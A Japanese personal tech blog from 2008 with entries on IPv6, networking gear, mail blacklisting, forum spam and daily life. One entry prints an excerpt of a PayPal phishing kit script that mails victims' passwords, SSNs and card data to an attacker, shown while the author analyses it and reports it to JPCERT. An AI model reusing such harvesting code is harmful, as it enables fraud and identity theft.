昨日実験したところ、接続ができました。
スレに書き込みを行おうとしたところ、本日は、富山NOCの電源メンテナンスのため、v6の接続性がないようで…。
スループットについては測定していないためどれぐらい出るかはわかりません。
以前、pingも通らなかったような気がしますが、pingの応答はありました。
昨日実験したところ、接続ができました。
スレに書き込みを行おうとしたところ、本日は、富山NOCの電源メンテナンスのため、v6の接続性がないようで…。
スループットについては測定していないためどれぐらい出るかはわかりません。
以前、pingも通らなかったような気がしますが、pingの応答はありました。
2008年12月7日(日) 9:00 〜 17:00 SFC法定停電となります。
irc.fujisawa.wide.ad.jp への到達性及びサーバが停止しますので他のサーバをご利用ください。
ELECOMのCat5e未開封新品のLANケーブルが1本当たり100円でした。
その辺で買えば結構高いのに…。ヤフオクへ流せばお金になるかなあ…とかおもったり…。
ざっとみたところ、100本程度有りました。
これなら、リールを買ってきて自分で作るより安い。私はPanduit及び愛三ケーブル若しくは、ELECOMといったケーブルを買って使っているが、R45Jのコネクタだけで60円するから、原価割れに近い金額で買えてしまう。理由がない限り、自分で作るのは馬鹿馬鹿しくかんじるこの頃。ってことで、ぽちっと買ってしまいました(苦笑)
家の中にLANケーブルだけで数十キロ分ぐらいの鉄のかたまりができてしまいました(笑)
ま、そのはなしはおいておいてですね、この前mixiに書いておいたATケースとM/Bをゴミ処理してもらえるって勢いで持って行ったんですよね。ついでに障害のでたIX2015を持って行ったり。
IX2015については、Fe1/1のLAN番目ポートのうちの1つがリンクアップしないことがあったため処分であったのですが、様子を見ていて結構唖然。まず、どういう物か確認しない、現行機種ですといっても、調べようともヒアリングもしないという状況で値段を付けられました。
台車で持ち込んだPC類ですが、ケースを開けて中を確認とかせず、そのまま。メモリの搭載状況とかHDDとか、CPUスペックとか一切確認せず、それ以前に段ボールからとり出して確認ですらしようとせず、ちらりととみた程度で値段を付けていました。
そのほか完全消去した不良セクタが大量にでていた3GB未満のHDDを持って行ったり。これも、エアキャップでつつんでおいたのですが、物を確認もしようとしませんでした。元々OSの起動ディスクにしか使われていない物でデータとかそういうのないし、取りあえず消去したあとだしね。
もう一つ、ML115についていた新品未使用品キーボードを持って行って幾らになるか聞いてみたところ、100円でした。さすがにそんな値段しか付けてくれない、物を確認しようとしない状況のお店ならば、売ろうとはしません。
キーボード無いかなぁ?と探している人にあげることにしますよ。。。
なんだかなぁ。という対応でした。
そう言うわけでハードオフは無償で引き取ってくれるゴミ処理場。お金になればよかったねー。ぐらいで、全てバラして持って行けばひょっとしたら一部のパーツは100円ぐらいになって多少は幸せになれるかも知れません。まっとうに売ろうとしても駄目だなぁと。それぐらいで割り切って使う所ですね。
真面目に売ろうと考えている物についてはヤフオクなりを使った方が正直お金になるので、オークションだと、○○以上で取引されているのでそっちに持って行きますときっぱりいって去りました。
ML115搭載のHP日本語キーボードを3台分。差し上げます。手渡しできる人限定でw
キーボードって要らないから、1000円引きとかないのかなぁ<HP
ハードオフの帰り立ち寄ってみて、道豚堀ラーメンを食べたくなりよってみたら、あれは期間限定だったようで、現在販売されていないため、帰ろうか悩んだところ、
赤鬼ニンニク味噌タンメンを食べてみた。感想は、、、。味噌の味が強すぎて、うまみがあんまり感じられなく喉が直ぐに渇く味。
麺については、それなりに美味しいけど、スープが強すぎて、途中で飽きてしまいました。。
辛さはそれなりあったので、好みだったけどとにかく喉が渇くスープだったので、最後まで呑むことが出来ませんでした。野菜類も、湯がいた野菜を載せてるだけという感じでスープで炒めたりとかそう言うのが無く、チェーン店らしい感じであんまり満足が出来ませんでした。二度目はきっと食べないでしょう。
掲示板が荒らされておりabuseにメールを送ったが対応されなかったため日曜日に改めてメールした。
Apacheの生ログ及びBBSのログetcを付けて再度メールしたがそれ以降、たくさーんのアクセスをいただいているみたいで…。
最初のアクセスは日曜日の昼過ぎにメールをしてから、1時間後にアクセスがあったため、abuse宛のメールは誰かが見ており、WinXPを使っていてFireFoxを使っている人からのアクセスがあった。その際にいろいろと私のサイトを訪問していただいたようでありがとうございます(笑) それから、LunascapeだとかIEだとかたくさんのUserAgentが確認されているし、社内ポータルサイトだと思われるところからのアクセスも有るため、メールに気づいていないわけではないようだが、未だに返事がありません。
ログを監視していたところ、該当のbbs -> プロファイル -> 日記とたどっているようなので、人気が高いようですね。
サイトを巡回して日記を見ている暇が有れば対応してくださいな。
(余談)
いろいろと見てたら、ドワンゴとおなじ/24上だったのね(謎)
あと、同一IPから、Bフレッツネタが人気の有るようで、以前からたくさんアクセスいただいているようだ
これいいなぁwww
マジかよ。。
SAKURAインターネットの件もそうだし。。
さくらのフレッツ接続は、これに影響うけてるのかしら。
例の新規募集中止ってあるし。。
ということで一部抜粋。
平成20年10月31日 アルファインターネット会員 各位 東京都渋谷区本町一丁目28番15号 アルファ総合研究所株式会社 代表取締役 榎本雅章 民事再生手続開始のご報告 拝啓 時下ますますご清栄のこととお慶び申し上げます。 なお、会員の皆様、利用者の皆様へのサービスに変更等はございません。 ご安心して、これまでと同様にご利用くださいますようお願い申し上げます。 このような厳しい経営状態でございますが、アルファインターネットのサービ スは、安心してご利用頂けるよう最善の努力をしてまいります。 今後とも会員様のご支援を賜りながら事業継続に向けて邁進していく所存でご ざいます。
wiki.tomocha.netがSolaris Zone上で動いているのですが、そーとー、IPv6で使うのには癖があるようです。
Solarisの場合、ip.tun0 というデバイスを使い、GREトンネルを作成するのですが、ip.tun0というデバイスは、Zone上にインターフェースとして作成することができません。
*1
すなわち、ip.tun0 からやってきたパケットをルーティングして、物理インターフェースやリンクローカルにアドレスを付け、それを割当、IPv6をしゃべると言うことになるのですが、問題はルーティングなのです。
Zone上では、StaticRouteやDefaultRouteを設定できず、グローバルゾーン上のルーティングに基づくのですが、デフォルトゲートウェイは、ip.tun0に向けるが、zoneからみれば、物理インターフェースのリンクローカルがデフォルトゲートウェイとなり、グローバルZone上からルーティングをさせる必要があります。
ここでリンクローカルのアドレスを使ったりするのですが、Solarisでは*BSDやLinuxに存在するどのインターフェースを使うか明示的に設定できないのです。
すなわち、DefaultRouteを複数書いてやる必要があったりしますが、自分自身のパケットをうまくルーティングできないといった問題がありました。
仕方なく、一端Zone上に割り当てているインターフェースからルーティングを行う別箱へ渡し、そこから、パケットを返し、ip.tun0へ渡すということを行えばできるようでした。
あと、defaultrouterに相当するdefaultrouter6 みたいなものがなかったりと、いろいろと大変そうです。探せば有るのかもしれませんが、起動スクリプトといったもので対応するしかなさそうな気がします。
自分自身でトンネルを掘り、がんばってルーティングを行わず、IPv6 Reachableなネットワーク上で使う分にはおそらく困らないでしょう。
仮想化、トンネルを一台の箱で行うと問題が出るようです。こういった使い方するひといるのかなあ?(^^;
今じゃ、IX2015が破格で売られていますので、そういう箱を使ってGREトンネルを造った方が安くて楽かもしれません。
リンクローカルのアドレスがめんどくさそうですが…。
ということで、試行錯誤して試験的にIPv6に対応してみました。
bb:- > nmap 210.174.204.115 Starting Nmap 4.62 ( http://nmap.org ) at 2008-11-06 23:53 JST Note: Host seems down. If it is really up, but blocking our ping probes, try -P0 Nmap finished: 1 IP address (0 hosts up) scanned in 0.032 seconds
という画面があり、whoisしてみたところ、 210.174.204.112/28 株式会社東京放送 のようだ(笑)
それにしても、番組中では、外が明るいのに、なんで、23:53なのでしょう?(ぉ
個人的には、このIPアドレスに対してnmapがどれぐらい来るか観察して貰いたい今日この頃です。> 株式会社東京放送 さんのなかの方々
「Yahoo!ケータイ」トップページについてを見る限りでは、2009年2月1日(日)以降有料化になるらしい。
すなわち、利用プラン変更等、webからたどり、暗証番号をいれ、確認後電話でプラン変更を行うという作業についてもお金がかかるわけですか。
また、利用料金明細を見るだけでもお金がかかるようになるわけですか。最悪ですね…。
後者については、ネットで見れるのであまり関係は無さそうですが、うっかりとボタンを押してしまうことを考えるとひどいなあと思います。
パケ定額等一切付けてないので、まず、webをみようとすることが有りませんが、うっかり作業中に押してしまった、なにかに当たってボタンおされてしまったということが数ヶ月に1,2回程度有る。これを防ぐ手だては内のだろうか?
今後発売される機種には、ブラウザを起動したあと、表示しますか?といった確認が出るようになるのだろうか。
パケット割引等を付けている前提で考えないで欲しい。
とんでもないもの…見つけてしまいました。
いいのかい、これ(汗)
http://210.***.***.***/PayPal.tgz
そして、そのサーバにはフィッシングサイトが仕掛けられていました。
$ lv carcabot.php --- $hostname = gethostbyaddr($ip); $message = "-----------------+ PayPal USA Bank Spam Result +-----------------\n"; $message .= "Email address : $user\n"; $message .= "PayPal Password : $pass\n\n"; $message .= "Full Name : $fullname\n"; $message .= "Mother Maiden Name : $mmn\n"; $message .= "Date of Birth : $bday/$bmonth/$byear\n"; $message .= "Social Security No : $ssn1-$ssn2-$ssn3\n"; $message .= "Phone Number : $userphone"; $meesage = "$message$defaultmsg$secmsg$cc1msg$cc2msg$cc3msg$cc4msg"; $measage = $default + $sec + $cc1 + $cc2 + $cc3 + $cc4; $rnessage = "$meesage\n"; $rnessage .= "---------------------------------------------------------\n"; $rnessage .= "Client IP : $ip\n"; $rnessage .= "HostName : $hostname\n"; $rnessage .= "Script : ".$_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME']."\n"; $rnessage .= "-----------------+ Created in 2008 by CarcaBot+------------------\n"; $emailme="****@******"; // Write your mail here ← gmailが埋まってた
明らかに…。フィッシングの様です。 検証環境で実験してみたところ、フォームに入力後、PayPalの本物サイトへ飛ばされ誘導されるようになっており、POSTと同時に、指定されたメールアドレスにクレジットカードの番号や、PayPalのアカウント情報等がメールされました。クレジットカード番号は、適当に入力すると拒否され、正しいパターンに基づいて入力するチェックまで入っています。
送信メール内容は上記の感じです。
8月頃からメールが届かなくて何故だと調べていたが、メールのログで、value-domain.com で検索していたので見つからず。
まあいいやとおもい、放置していたのだが、ドメインの有効期限の通知メールやら届かないので調査してみた。(1コExpiresれてしまったので…。まだ、猶予期間だったため間に合った。)
で、過去のメールからメールヘッダを調査したところ、メールサーバは、sakura1.digi-rock.com[202.222.31.77]。すなわち、digi-rock.com で検索してればよかったようだ。
Nov 9 06:01:58 ns0 postfix/smtpd[23994]: NOQUEUE: reject: RCPT from sakura1.digi-rock.com[202.222.31.77]: 554 5.7.1 Service unavailable; Client host [202.222.31.77] blocked using zen.spamhaus.org; http://www.spamhaus.org/SBL/sbl.lasso?query=SBL67399; from=<root@sakura1.digi-rock.com> to=<***@example.com> proto=SMTP helo=<sakura1.digi-rock.com>
情報からわかることは、zen.spamhaus.org に登録されているぞ、ということ。情報を見たければ
URLを開けば詳細がわかる。
見てみたところ、次のように書いてある。
page carefully. It contains the reason for the listing and who to contact about it. Ref: SBL67399 202.222.31.77/32 is listed on the Spamhaus Block List (SBL) 27-Aug-2008 03:37 GMT | SR10 landing site for cell phone spammer. Japanese language spam to cell phones sourced in the philipines (SBL 67396) landing sites:
ぉぃぉぃ・・・。ケイタイへのスパムって(-_-;;;)
そういうわけで、届かないという状況の人は、zen.spamhaus.org を外すか、ホワイトリストを登録してください…。
返事があったが、全く勘違いしているようで。。。
Value-Domainの回答としては、次の通り
あのー。。。自社のサーバで実施してください(笑)
自社の自分自身の使っている重要なメールサーバ(共有サーバではない)であるはずのところが、RBLに登録されているにもかかわらず、まったく危機感がないようで、のんきな対応だ。。。だめだこりゃ。安かろう悪かろうの対応なのかしらねぇ。売上高はそーとーあるようですが。
なお、関連するスレッドのリンクをわざわざ連絡、コメントをのこしているのにもかかわらず的外れの回答でした。おもしろいネタをありがとう。。。
ちなみにそのValueDomainから届くメールには、ドメイン有効期限、お知らせメール、領収明細書などが含まれています。そういうサーバがRBLに登録されること自体問題があるのではないでしょうか。運用体制が問われる状況ですね。
勘違いしていて申し訳ありませんと、連絡がありました。
内容からする察するには、value-domain側も認識しているようで…。
ですが、ユーザのコミュニティーとして提供している掲示板については、
至って放置で周知されていないようです。
可能性があることといったものを、周知して欲しいものです。
尚、関連するスレッドとしては、
ドメイン有効期限のお知らせなどのメールが送信されてこない - XREA&CORE SUPPORT BOARD:
にありますが、もうそろそろ1ヶ月たとうとしていますが、この有様です。
皆さん気をつけましょう…。
value-domain の行動から伺えることとして、
「その他のアドレスを使え、メールは信用するな、届かないのを前提で運用しろ」
というスタンスのようです。
そういう空気が上記のスレッドから読めてしまいました。
皆さん気をつけてください。
postfixについては余り詳しくないですが、次のようにしておけば、とりあえずは大丈夫なのかな。(未確認)
/usr/local/etc/postfix/main.cf ---- smtpd_client_restrictions = permit_mynetworks, check_client_access hash:/usr/local/etc/postfix/restrict_clients, reject_rbl_client ... , permit ---- /usr/local/etc/postfix/restrict_clients ---- 202.222.31.77 OK ----
$ host www.ipv6domain.com www.ipv6domain.com has address 61.33.161.10 $ host -taaaa www.ipv6domain.com www.ipv6domain.com has no AAAA record
IPv6という名前を使って欲しくないな、とおもう今日この頃。
まあ、感じたところによると、AddPacという会社はIPv6Readyな製品を出しているからそういう名前を付けているのだろうか。
誤解を生むドメインだ。
そういう名前を使う以上サイトもIPv6に対応させようよね。
これはひどいと思った人はどれぐらいいるのでしょう?(^^;)
JPCERT/CC経由でインシデント報告を入れていただきましたが、対応されたようです。
月曜日の夕方に報告して本日先ほど対応したとのメールが来ていました。
対応が早くてびっくり。
Apacheのログでどうぞ。うちのサイトは全てIPv6に対応していますが、対応していないところはリバースプロキシで対応させていたりします。
なので、アプリケーション側では取れないのでApacheの生ログですが…
2a01:e0b:1:84:2e0:f4ff:fe19:e711 - - [27/Nov/2008:18:16:03 +0900] "POST /cgi-bin/bbs/index.cgi HTTP/1.1" 200 67734 "http://tomocha.net/cgi-bin/bbs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 2a01:e0b:1:84:2e0:f4ff:fe19:e711 - - [27/Nov/2008:18:16:46 +0900] "POST /cgi-bin/bbs/index.cgi HTTP/1.1" 200 66846 "http://tomocha.net/cgi-bin/bbs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
内容は次のような感じ…
★ frVKuooAGPUAwTapbu From kuydiqril Home 3GDr2P jusclwopmgjo, [url=http://ewduhfhkinls.com/]ewduhfhkinls[/url], [link=http://ntmjgoggmocu.com/]ntmjgoggmocu[/link], http://zpucqgfboxis.com/
現在のIPv4では当たり前の時代がやっとIPv6で到来しましたか...
arege鍋が結構されたようで…。急遽確定されたため人が集まらない。言い出しっぺが風邪で来ないなどなど、びみょーなスタートになりました。で、うちひとりがハバネロの味をもってきたので、そのまま食べたのですが…すごい痛いってなんの(笑)
毒物のようでした(笑)
てことで、何故か男しか集まらなく。両手に華…(ではなかったw)去年の鍋は14人でした・・・。